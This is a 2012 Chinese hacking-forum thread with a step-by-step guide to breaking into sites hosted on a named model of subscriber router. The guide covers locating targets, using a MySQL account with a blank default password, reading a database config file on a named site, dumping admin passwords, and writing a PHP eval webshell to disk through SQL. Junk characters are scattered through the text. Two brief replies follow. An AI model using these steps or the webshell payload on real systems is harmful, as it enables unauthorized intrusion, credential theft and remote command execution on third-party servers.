找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3067|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
" ~/ N6 u7 j' Q% @
, |1 C8 Z3 g7 Z2 A1:google搜索'Raonet Subscriber Ethernet Router'2 a  m6 `1 W8 M/ r

0 {$ f( g" f% L: b) z/ |2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
% g/ {2 x3 ^1 W* }, x( a1 A9 Q2 [2 ^! W$ w+ V
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。+ ]$ A, O+ b* S1 W% ]2 y4 N' a

9 X3 V( t, u% k" d2 u2 X//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......4 Y5 }; M$ O3 H) z

' a  [$ H% B6 E% c1 x 4 l1 ^$ b& Q% n) q

; b& m8 \! ~9 W$ {9 ]: }1 c入侵步骤:
4 z+ q) N* U5 h8 h3 t
4 x& n/ s! u6 k/ I; V- }/ S; g* I1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php; n: c0 l; ^. L4 Z8 W  q* j
8 e% H5 \+ X" ]# N2 {
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc; L8 S, r) J+ l% C" U5 r
3:得到密码后连接,查看GUI管理密码:$ v$ l: r) F7 y8 W
use ser_5009 D8 j  ]( K# K$ L; J. ~
select id,passwd from user;
, X) W7 b/ X. c1 u2 R2 v4:通过数据库写入webshell,执行命令:5 t$ _/ Z& \* w5 C0 J1 x, p, x
use mysql;9 I3 X. w4 B/ u4 s0 h) ^* i* n
create table ok(cmd TEXT);2 ]5 z% u4 Y3 `1 l; e  g5 B8 T
insert into ok values("<?php @eval($_POST[cmd])?>");# ^2 K1 }9 }* D4 y( u0 {( a! W
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
* e7 W+ U4 A% Bdrop table ok;
0 x) ?0 u0 d/ {" P: p5 w) V7 x0 [. I9 l0 u2 j% ^3 w# n  }
5:连接后门shell.php
' T$ @" \1 }5 g. I7 D5 Y! ?
6 [6 g6 z  d$ p6. 搞定!
3 I" ]* u1 V  i! G$ o+ x! ^  S) q% |; l
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表